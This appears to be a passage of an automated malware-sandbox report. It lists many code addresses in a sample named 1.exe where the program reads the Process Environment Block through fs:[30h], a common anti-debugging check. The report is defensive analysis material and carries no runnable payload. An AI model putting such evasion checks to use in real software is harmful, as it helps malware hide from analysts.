Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_017A019F mov eax, dword ptr fs:[00000030h]	2_2_017A019F
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_017A019F mov eax, dword ptr fs:[00000030h]	2_2_017A019F
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_0171A197 mov eax, dword ptr fs:[00000030h]	2_2_0171A197
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_0171A197 mov eax, dword ptr fs:[00000030h]	2_2_0171A197
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_0171A197 mov eax, dword ptr fs:[00000030h]	2_2_0171A197
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_01760185 mov eax, dword ptr fs:[00000030h]	2_2_01760185
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_017DC188 mov eax, dword ptr fs:[00000030h]	2_2_017DC188
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_017DC188 mov eax, dword ptr fs:[00000030h]	2_2_017DC188
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_017C4180 mov eax, dword ptr fs:[00000030h]	2_2_017C4180
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_017C4180 mov eax, dword ptr fs:[00000030h]	2_2_017C4180
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_0174C073 mov eax, dword ptr fs:[00000030h]	2_2_0174C073
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_01722050 mov eax, dword ptr fs:[00000030h]	2_2_01722050
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_017A6050 mov eax, dword ptr fs:[00000030h]	2_2_017A6050
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_017B6030 mov eax, dword ptr fs:[00000030h]	2_2_017B6030
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_0171A020 mov eax, dword ptr fs:[00000030h]	2_2_0171A020
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_0171C020 mov eax, dword ptr fs:[00000030h]	2_2_0171C020
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_0173E016 mov eax, dword ptr fs:[00000030h]	2_2_0173E016
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_0173E016 mov eax, dword ptr fs:[00000030h]	2_2_0173E016
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_0173E016 mov eax, dword ptr fs:[00000030h]	2_2_0173E016
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_0173E016 mov eax, dword ptr fs:[00000030h]	2_2_0173E016
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_017A4000 mov ecx, dword ptr fs:[00000030h]	2_2_017A4000
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_017C2000 mov eax, dword ptr fs:[00000030h]	2_2_017C2000
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_017C2000 mov eax, dword ptr fs:[00000030h]	2_2_017C2000
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_017C2000 mov eax, dword ptr fs:[00000030h]	2_2_017C2000
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_017C2000 mov eax, dword ptr fs:[00000030h]	2_2_017C2000
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_017C2000 mov eax, dword ptr fs:[00000030h]	2_2_017C2000
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_017C2000 mov eax, dword ptr fs:[00000030h]	2_2_017C2000
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_017C2000 mov eax, dword ptr fs:[00000030h]	2_2_017C2000
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_017C2000 mov eax, dword ptr fs:[00000030h]	2_2_017C2000
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_0171C0F0 mov eax, dword ptr fs:[00000030h]	2_2_0171C0F0
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_017620F0 mov ecx, dword ptr fs:[00000030h]	2_2_017620F0
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_0171A0E3 mov ecx, dword ptr fs:[00000030h]	2_2_0171A0E3
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_017A60E0 mov eax, dword ptr fs:[00000030h]	2_2_017A60E0
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_017280E9 mov eax, dword ptr fs:[00000030h]	2_2_017280E9
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_017A20DE mov eax, dword ptr fs:[00000030h]	2_2_017A20DE
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_017E60B8 mov eax, dword ptr fs:[00000030h]	2_2_017E60B8
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_017E60B8 mov ecx, dword ptr fs:[00000030h]	2_2_017E60B8
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_017180A0 mov eax, dword ptr fs:[00000030h]	2_2_017180A0
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_017B80A8 mov eax, dword ptr fs:[00000030h]	2_2_017B80A8
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_0172208A mov eax, dword ptr fs:[00000030h]	2_2_0172208A
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_017C437C mov eax, dword ptr fs:[00000030h]	2_2_017C437C
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_017A035C mov eax, dword ptr fs:[00000030h]	2_2_017A035C
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_017A035C mov eax, dword ptr fs:[00000030h]	2_2_017A035C
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_017A035C mov eax, dword ptr fs:[00000030h]	2_2_017A035C
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_017A035C mov ecx, dword ptr fs:[00000030h]	2_2_017A035C
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_017A035C mov eax, dword ptr fs:[00000030h]	2_2_017A035C
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_017A035C mov eax, dword ptr fs:[00000030h]	2_2_017A035C
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_017EA352 mov eax, dword ptr fs:[00000030h]	2_2_017EA352
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_017C8350 mov ecx, dword ptr fs:[00000030h]	2_2_017C8350
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_017F634F mov eax, dword ptr fs:[00000030h]	2_2_017F634F
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_017A2349 mov eax, dword ptr fs:[00000030h]	2_2_017A2349
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_017A2349 mov eax, dword ptr fs:[00000030h]	2_2_017A2349
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_017A2349 mov eax, dword ptr fs:[00000030h]	2_2_017A2349
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_017A2349 mov eax, dword ptr fs:[00000030h]	2_2_017A2349
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_017A2349 mov eax, dword ptr fs:[00000030h]	2_2_017A2349
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_017A2349 mov eax, dword ptr fs:[00000030h]	2_2_017A2349
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_017A2349 mov eax, dword ptr fs:[00000030h]	2_2_017A2349
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_017A2349 mov eax, dword ptr fs:[00000030h]	2_2_017A2349
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_017A2349 mov eax, dword ptr fs:[00000030h]	2_2_017A2349
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_017A2349 mov eax, dword ptr fs:[00000030h]	2_2_017A2349
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_017A2349 mov eax, dword ptr fs:[00000030h]	2_2_017A2349
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_017A2349 mov eax, dword ptr fs:[00000030h]	2_2_017A2349
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_017A2349 mov eax, dword ptr fs:[00000030h]	2_2_017A2349
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_017A2349 mov eax, dword ptr fs:[00000030h]	2_2_017A2349
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_017A2349 mov eax, dword ptr fs:[00000030h]	2_2_017A2349
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_017F8324 mov eax, dword ptr fs:[00000030h]	2_2_017F8324
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_017F8324 mov ecx, dword ptr fs:[00000030h]	2_2_017F8324
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_017F8324 mov eax, dword ptr fs:[00000030h]	2_2_017F8324
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_017F8324 mov eax, dword ptr fs:[00000030h]	2_2_017F8324
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_0171C310 mov ecx, dword ptr fs:[00000030h]	2_2_0171C310
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_01740310 mov ecx, dword ptr fs:[00000030h]	2_2_01740310
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_0175A30B mov eax, dword ptr fs:[00000030h]	2_2_0175A30B
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_0175A30B mov eax, dword ptr fs:[00000030h]	2_2_0175A30B
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_0175A30B mov eax, dword ptr fs:[00000030h]	2_2_0175A30B
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_0173E3F0 mov eax, dword ptr fs:[00000030h]	2_2_0173E3F0
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_0173E3F0 mov eax, dword ptr fs:[00000030h]	2_2_0173E3F0
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_0173E3F0 mov eax, dword ptr fs:[00000030h]	2_2_0173E3F0
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_017563FF mov eax, dword ptr fs:[00000030h]	2_2_017563FF
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_017303E9 mov eax, dword ptr fs:[00000030h]	2_2_017303E9
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_017303E9 mov eax, dword ptr fs:[00000030h]	2_2_017303E9
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_017303E9 mov eax, dword ptr fs:[00000030h]	2_2_017303E9
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_017303E9 mov eax, dword ptr fs:[00000030h]	2_2_017303E9
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_017303E9 mov eax, dword ptr fs:[00000030h]	2_2_017303E9
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_017303E9 mov eax, dword ptr fs:[00000030h]	2_2_017303E9
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_017303E9 mov eax, dword ptr fs:[00000030h]	2_2_017303E9
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_017303E9 mov eax, dword ptr fs:[00000030h]	2_2_017303E9
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_017CE3DB mov eax, dword ptr fs:[00000030h]	2_2_017CE3DB
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_017CE3DB mov eax, dword ptr fs:[00000030h]	2_2_017CE3DB
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_017CE3DB mov ecx, dword ptr fs:[00000030h]	2_2_017CE3DB
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_017CE3DB mov eax, dword ptr fs:[00000030h]	2_2_017CE3DB
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_017C43D4 mov eax, dword ptr fs:[00000030h]	2_2_017C43D4
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_017C43D4 mov eax, dword ptr fs:[00000030h]	2_2_017C43D4
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_017DC3CD mov eax, dword ptr fs:[00000030h]	2_2_017DC3CD
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_0172A3C0 mov eax, dword ptr fs:[00000030h]	2_2_0172A3C0
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_0172A3C0 mov eax, dword ptr fs:[00000030h]	2_2_0172A3C0
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_0172A3C0 mov eax, dword ptr fs:[00000030h]	2_2_0172A3C0
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_0172A3C0 mov eax, dword ptr fs:[00000030h]	2_2_0172A3C0
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_0172A3C0 mov eax, dword ptr fs:[00000030h]	2_2_0172A3C0
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_0172A3C0 mov eax, dword ptr fs:[00000030h]	2_2_0172A3C0
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_017283C0 mov eax, dword ptr fs:[00000030h]	2_2_017283C0
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_017283C0 mov eax, dword ptr fs:[00000030h]	2_2_017283C0
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_017283C0 mov eax, dword ptr fs:[00000030h]	2_2_017283C0
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_017283C0 mov eax, dword ptr fs:[00000030h]	2_2_017283C0
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_017A63C0 mov eax, dword ptr fs:[00000030h]	2_2_017A63C0
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_01718397 mov eax, dword ptr fs:[00000030h]	2_2_01718397
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_01718397 mov eax, dword ptr fs:[00000030h]	2_2_01718397
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_01718397 mov eax, dword ptr fs:[00000030h]	2_2_01718397
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_0171E388 mov eax, dword ptr fs:[00000030h]	2_2_0171E388
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_0171E388 mov eax, dword ptr fs:[00000030h]	2_2_0171E388
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_0171E388 mov eax, dword ptr fs:[00000030h]	2_2_0171E388
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_0174438F mov eax, dword ptr fs:[00000030h]	2_2_0174438F
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_0174438F mov eax, dword ptr fs:[00000030h]	2_2_0174438F
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_017D0274 mov eax, dword ptr fs:[00000030h]	2_2_017D0274
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_017D0274 mov eax, dword ptr fs:[00000030h]	2_2_017D0274
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_017D0274 mov eax, dword ptr fs:[00000030h]	2_2_017D0274
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_017D0274 mov eax, dword ptr fs:[00000030h]	2_2_017D0274
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_017D0274 mov eax, dword ptr fs:[00000030h]	2_2_017D0274
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_017D0274 mov eax, dword ptr fs:[00000030h]	2_2_017D0274
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_017D0274 mov eax, dword ptr fs:[00000030h]	2_2_017D0274
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_017D0274 mov eax, dword ptr fs:[00000030h]	2_2_017D0274
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_017D0274 mov eax, dword ptr fs:[00000030h]	2_2_017D0274
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_017D0274 mov eax, dword ptr fs:[00000030h]	2_2_017D0274
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_017D0274 mov eax, dword ptr fs:[00000030h]	2_2_017D0274
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_017D0274 mov eax, dword ptr fs:[00000030h]	2_2_017D0274
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_01724260 mov eax, dword ptr fs:[00000030h]	2_2_01724260
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_01724260 mov eax, dword ptr fs:[00000030h]	2_2_01724260
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_01724260 mov eax, dword ptr fs:[00000030h]	2_2_01724260
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_0171826B mov eax, dword ptr fs:[00000030h]	2_2_0171826B
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_0171A250 mov eax, dword ptr fs:[00000030h]	2_2_0171A250
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_017F625D mov eax, dword ptr fs:[00000030h]	2_2_017F625D
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_01726259 mov eax, dword ptr fs:[00000030h]	2_2_01726259
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_017DA250 mov eax, dword ptr fs:[00000030h]	2_2_017DA250
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_017DA250 mov eax, dword ptr fs:[00000030h]	2_2_017DA250
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_017A8243 mov eax, dword ptr fs:[00000030h]	2_2_017A8243
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_017A8243 mov ecx, dword ptr fs:[00000030h]	2_2_017A8243
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_0171823B mov eax, dword ptr fs:[00000030h]	2_2_0171823B
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_017302E1 mov eax, dword ptr fs:[00000030h]	2_2_017302E1
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_017302E1 mov eax, dword ptr fs:[00000030h]	2_2_017302E1
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_017302E1 mov eax, dword ptr fs:[00000030h]	2_2_017302E1
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_017F62D6 mov eax, dword ptr fs:[00000030h]	2_2_017F62D6
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_0172A2C3 mov eax, dword ptr fs:[00000030h]	2_2_0172A2C3
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_0172A2C3 mov eax, dword ptr fs:[00000030h]	2_2_0172A2C3
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_0172A2C3 mov eax, dword ptr fs:[00000030h]	2_2_0172A2C3
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_0172A2C3 mov eax, dword ptr fs:[00000030h]	2_2_0172A2C3
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_0172A2C3 mov eax, dword ptr fs:[00000030h]	2_2_0172A2C3
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_017302A0 mov eax, dword ptr fs:[00000030h]	2_2_017302A0
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_017302A0 mov eax, dword ptr fs:[00000030h]	2_2_017302A0
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_017B62A0 mov eax, dword ptr fs:[00000030h]	2_2_017B62A0
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_017B62A0 mov ecx, dword ptr fs:[00000030h]	2_2_017B62A0
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_017B62A0 mov eax, dword ptr fs:[00000030h]	2_2_017B62A0
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_017B62A0 mov eax, dword ptr fs:[00000030h]	2_2_017B62A0
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_017B62A0 mov eax, dword ptr fs:[00000030h]	2_2_017B62A0
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_017B62A0 mov eax, dword ptr fs:[00000030h]	2_2_017B62A0
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_0175E284 mov eax, dword ptr fs:[00000030h]	2_2_0175E284
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_0175E284 mov eax, dword ptr fs:[00000030h]	2_2_0175E284
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_017A0283 mov eax, dword ptr fs:[00000030h]	2_2_017A0283
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_017A0283 mov eax, dword ptr fs:[00000030h]	2_2_017A0283
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_017A0283 mov eax, dword ptr fs:[00000030h]	2_2_017A0283
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_0175656A mov eax, dword ptr fs:[00000030h]	2_2_0175656A
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_0175656A mov eax, dword ptr fs:[00000030h]	2_2_0175656A
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_0175656A mov eax, dword ptr fs:[00000030h]	2_2_0175656A
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_01728550 mov eax, dword ptr fs:[00000030h]	2_2_01728550
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_01728550 mov eax, dword ptr fs:[00000030h]	2_2_01728550
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_01730535 mov eax, dword ptr fs:[00000030h]	2_2_01730535
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_01730535 mov eax, dword ptr fs:[00000030h]	2_2_01730535
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_01730535 mov eax, dword ptr fs:[00000030h]	2_2_01730535
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_01730535 mov eax, dword ptr fs:[00000030h]	2_2_01730535
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_01730535 mov eax, dword ptr fs:[00000030h]	2_2_01730535
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_01730535 mov eax, dword ptr fs:[00000030h]	2_2_01730535
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_0174E53E mov eax, dword ptr fs:[00000030h]	2_2_0174E53E
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_0174E53E mov eax, dword ptr fs:[00000030h]	2_2_0174E53E
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_0174E53E mov eax, dword ptr fs:[00000030h]	2_2_0174E53E
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_0174E53E mov eax, dword ptr fs:[00000030h]	2_2_0174E53E
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_0174E53E mov eax, dword ptr fs:[00000030h]	2_2_0174E53E
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_017B6500 mov eax, dword ptr fs:[00000030h]	2_2_017B6500
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_017F4500 mov eax, dword ptr fs:[00000030h]	2_2_017F4500
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_017F4500 mov eax, dword ptr fs:[00000030h]	2_2_017F4500
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_017F4500 mov eax, dword ptr fs:[00000030h]	2_2_017F4500
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_017F4500 mov eax, dword ptr fs:[00000030h]	2_2_017F4500
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_017F4500 mov eax, dword ptr fs:[00000030h]	2_2_017F4500
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_017F4500 mov eax, dword ptr fs:[00000030h]	2_2_017F4500
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_017F4500 mov eax, dword ptr fs:[00000030h]	2_2_017F4500
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_017225E0 mov eax, dword ptr fs:[00000030h]	2_2_017225E0
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_0174E5E7 mov eax, dword ptr fs:[00000030h]	2_2_0174E5E7
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_0174E5E7 mov eax, dword ptr fs:[00000030h]	2_2_0174E5E7
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_0174E5E7 mov eax, dword ptr fs:[00000030h]	2_2_0174E5E7
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_0174E5E7 mov eax, dword ptr fs:[00000030h]	2_2_0174E5E7
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_0174E5E7 mov eax, dword ptr fs:[00000030h]	2_2_0174E5E7
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_0174E5E7 mov eax, dword ptr fs:[00000030h]	2_2_0174E5E7
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_0174E5E7 mov eax, dword ptr fs:[00000030h]	2_2_0174E5E7
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_0174E5E7 mov eax, dword ptr fs:[00000030h]	2_2_0174E5E7
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_0175C5ED mov eax, dword ptr fs:[00000030h]	2_2_0175C5ED
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_0175C5ED mov eax, dword ptr fs:[00000030h]	2_2_0175C5ED
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_017265D0 mov eax, dword ptr fs:[00000030h]	2_2_017265D0
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_0175A5D0 mov eax, dword ptr fs:[00000030h]	2_2_0175A5D0
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_0175A5D0 mov eax, dword ptr fs:[00000030h]	2_2_0175A5D0
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_0175E5CF mov eax, dword ptr fs:[00000030h]	2_2_0175E5CF
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_0175E5CF mov eax, dword ptr fs:[00000030h]	2_2_0175E5CF
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_017445B1 mov eax, dword ptr fs:[00000030h]	2_2_017445B1
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_017445B1 mov eax, dword ptr fs:[00000030h]	2_2_017445B1
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_017A05A7 mov eax, dword ptr fs:[00000030h]	2_2_017A05A7
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_017A05A7 mov eax, dword ptr fs:[00000030h]	2_2_017A05A7
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_017A05A7 mov eax, dword ptr fs:[00000030h]	2_2_017A05A7
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_0175E59C mov eax, dword ptr fs:[00000030h]	2_2_0175E59C
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_01722582 mov eax, dword ptr fs:[00000030h]	2_2_01722582
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_01722582 mov ecx, dword ptr fs:[00000030h]	2_2_01722582
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_01754588 mov eax, dword ptr fs:[00000030h]	2_2_01754588
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_0174A470 mov eax, dword ptr fs:[00000030h]	2_2_0174A470
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_0174A470 mov eax, dword ptr fs:[00000030h]	2_2_0174A470
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_0174A470 mov eax, dword ptr fs:[00000030h]	2_2_0174A470
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_017AC460 mov ecx, dword ptr fs:[00000030h]	2_2_017AC460
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_017DA456 mov eax, dword ptr fs:[00000030h]	2_2_017DA456
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_0171645D mov eax, dword ptr fs:[00000030h]	2_2_0171645D
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_0174245A mov eax, dword ptr fs:[00000030h]	2_2_0174245A
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_0175E443 mov eax, dword ptr fs:[00000030h]	2_2_0175E443
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_0175E443 mov eax, dword ptr fs:[00000030h]	2_2_0175E443
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_0175E443 mov eax, dword ptr fs:[00000030h]	2_2_0175E443
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_0175E443 mov eax, dword ptr fs:[00000030h]	2_2_0175E443
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_0175E443 mov eax, dword ptr fs:[00000030h]	2_2_0175E443
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_0175E443 mov eax, dword ptr fs:[00000030h]	2_2_0175E443
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_0175E443 mov eax, dword ptr fs:[00000030h]	2_2_0175E443
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_0175E443 mov eax, dword ptr fs:[00000030h]	2_2_0175E443
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_0175A430 mov eax, dword ptr fs:[00000030h]	2_2_0175A430
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_0171E420 mov eax, dword ptr fs:[00000030h]	2_2_0171E420
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_0171E420 mov eax, dword ptr fs:[00000030h]	2_2_0171E420
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_0171E420 mov eax, dword ptr fs:[00000030h]	2_2_0171E420
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_0171C427 mov eax, dword ptr fs:[00000030h]	2_2_0171C427
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_017A6420 mov eax, dword ptr fs:[00000030h]	2_2_017A6420
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_017A6420 mov eax, dword ptr fs:[00000030h]	2_2_017A6420
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_017A6420 mov eax, dword ptr fs:[00000030h]	2_2_017A6420
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_017A6420 mov eax, dword ptr fs:[00000030h]	2_2_017A6420
Source: C:\Users\user\Desktop\1.exe	Code function: 2_2_017A6420 mov eax, dword ptr fs:[00000030h]	2_2_017A6420
